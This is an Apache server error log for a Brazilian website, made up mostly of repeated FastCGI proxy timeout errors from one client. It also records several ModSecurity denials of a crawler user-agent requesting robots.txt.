[Sun Mar 15 22:27:47.725796 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:45796] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:28:11.121810 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:45990] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:28:33.123090 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46202] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:28:55.053546 2026] [proxy_fcgi:error] [pid 32654:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:46396] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:29:17.131445 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:46604] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:29:39.069855 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46924] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:30:00.127813 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47192] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:30:22.133806 2026] [proxy_fcgi:error] [pid 32654:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:47424] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:30:25.773059 2026] [:error] [pid 32654:tid 140411590858496] [client 74.7.244.31:40696] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abddMQlT9VtDQc7bgUxZ1gAAARI"]
[Sun Mar 15 22:30:43.125780 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:47628] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:31:04.121805 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47858] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:31:10.296088 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.228.16:46280] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abddXglT9VtDQc7bgUxZ7AAAAQA"]
[Sun Mar 15 22:31:25.037836 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48158] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:31:46.125788 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48336] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:32:07.121263 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48598] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:32:28.133807 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48812] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:32:49.137905 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:49042] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:33:10.065821 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:49270] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:33:32.097421 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49508] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:33:54.049834 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:49782] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:34:18.069815 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:50130] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:34:39.129085 2026] [proxy_fcgi:error] [pid 32654:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:50390] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:35:03.194349 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:50600] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:35:25.082897 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:50888] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:35:30.977424 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.244.31:40718] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdeYnjZBu2q05ozVU8XkgAAAUw"]
[Sun Mar 15 22:35:46.122468 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51058] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:36:07.137790 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:51274] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:36:14.703043 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.228.16:37184] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdejpqj1wV0Si-Okeep-AAAAAM"]
[Sun Mar 15 22:36:28.133812 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:51444] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:36:49.041849 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51724] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:37:10.126589 2026] [proxy_fcgi:error] [pid 32654:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:51914] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:37:31.121986 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:52080] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:37:52.124662 2026] [proxy_fcgi:error] [pid 32654:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52294] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:38:13.125796 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52494] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:38:34.129851 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:52632] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:38:55.130561 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:52818] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:39:16.125840 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53028] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:39:39.126115 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:53270] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:40:01.045801 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53524] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:40:23.125854 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53780] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:40:52.148684 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:54150] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:40:52.546296 2026] [:error] [pid 32654:tid 140411607643904] [client 74.7.244.31:47814] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdfpAlT9VtDQc7bgUxbBQAAARA"]
[Sun Mar 15 22:41:13.079950 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54296] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:41:34.045864 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54528] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:41:55.125778 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:54698] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:42:16.092970 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:54886] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:42:37.118215 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55032] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:42:58.133784 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:55262] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:43:19.125896 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55412] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:43:40.127348 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55624] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:44:01.141876 2026] [proxy_fcgi:error] [pid 21946:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:55866] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:44:22.133821 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56044] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:44:43.129862 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56300] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:45:04.137818 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56478] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:45:26.121222 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56652] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:45:47.121829 2026] [proxy_fcgi:error] [pid 32654:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:56846] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:46:13.106914 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:57058] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:46:34.137785 2026] [proxy_fcgi:error] [pid 32654:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57310] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:46:55.121816 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:57514] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:47:16.120042 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57670] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:47:37.130789 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57830] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:47:58.129950 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:58054] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:48:24.131276 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58242] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:48:45.126627 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58528] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:49:06.125790 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58758] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:49:28.125813 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:58992] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:49:49.121225 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:59222] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:50:10.131425 2026] [proxy_fcgi:error] [pid 32654:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:59432] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:50:32.121794 2026] [proxy_fcgi:error] [pid 32654:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59614] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:50:53.057850 2026] [proxy_fcgi:error] [pid 32654:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59804] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:51:14.129840 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:59982] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:51:21.904451 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.244.31:39924] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdiGXjZBu2q05ozVU8ZHwAAAVM"]
[Sun Mar 15 22:51:35.141805 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60158] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:51:57.125797 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60370] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:52:02.210571 2026] [:error] [pid 21946:tid 140411565680384] [client 74.7.228.16:47300] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdiQnbQATo66fKoS7wQXQAAANU"]
[Sun Mar 15 22:52:19.123091 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:60608] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:52:41.101825 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60834] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:53:02.125814 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:32794] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:53:23.102645 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:32972] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:53:45.125910 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33150] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:54:06.099219 2026] [proxy_fcgi:error] [pid 32654:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33326] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:54:27.121787 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:33524] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:54:49.131397 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33654] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:55:10.121897 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:33794] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:55:31.108537 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33902] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:55:55.118224 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:34072] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:56:16.129764 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34260] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:56:25.806146 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.244.31:43564] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdjSZqj1wV0Si-OkeesXgAAABc"]
[Sun Mar 15 22:56:40.129874 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:34446] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:57:01.120445 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:34552] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:57:07.143239 2026] [:error] [pid 11972:tid 140411666392832] [client 74.7.228.16:35472] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdjc5qj1wV0Si-OkeesagAAAAk"]
[Sun Mar 15 22:57:23.122337 2026] [proxy_fcgi:error] [pid 21946:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34668] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:57:44.033911 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:34846] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:58:06.125786 2026] [proxy_fcgi:error] [pid 11972:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:34940] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:58:28.156893 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35060] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:58:49.433859 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35176] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:59:11.061687 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35300] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:59:32.046010 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35410] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:59:53.053827 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:35548] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:00:14.057881 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35746] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:00:35.133794 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35872] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:00:57.113386 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:36040] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:01:18.129788 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:36176] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:01:39.122904 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:36360] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:01:45.013859 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.244.31:58418] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdkiXbQATo66fKoS7wRAwAAANI"]
[Sun Mar 15 23:02:06.141791 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36472] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:02:27.084179 2026] [:error] [pid 21946:tid 140411674785536] [client 74.7.228.16:57920] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdks3bQATo66fKoS7wRFQAAAMg"]
[Sun Mar 15 23:02:28.122825 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36612] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:02:49.131031 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:36758] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:03:11.105451 2026] [proxy_fcgi:error] [pid 32654:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36994] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:03:32.073570 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:37152] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:03:53.131357 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37294] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:04:16.122137 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37448] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:04:37.122720 2026] [proxy_fcgi:error] [pid 32654:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:37550] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:04:58.081831 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37694] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:05:20.035702 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37806] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:05:41.129869 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37986] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:06:03.125769 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38162] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:06:24.038085 2026] [proxy_fcgi:error] [pid 32654:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:38366] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:06:45.137821 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38554] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:06:53.873931 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.244.31:50314] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdlvQlT9VtDQc7bgUxdmQAAARQ"]
[Sun Mar 15 23:07:06.080469 2026] [proxy_fcgi:error] [pid 32654:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38678] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:07:27.109839 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38834] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:07:37.778095 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.228.16:40670] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdl6dSswJuvopo3lOgrGAAAAJI"]
[Sun Mar 15 23:07:49.110034 2026] [proxy_fcgi:error] [pid 32654:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:39008] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:08:10.130146 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39222] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:08:32.143258 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:39432] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:08:53.123194 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39652] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:09:14.132551 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39772] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:09:37.139073 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39894] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:09:59.144020 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40066] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:10:21.125826 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40200] AH01075: Error dispatching request to : (polling)
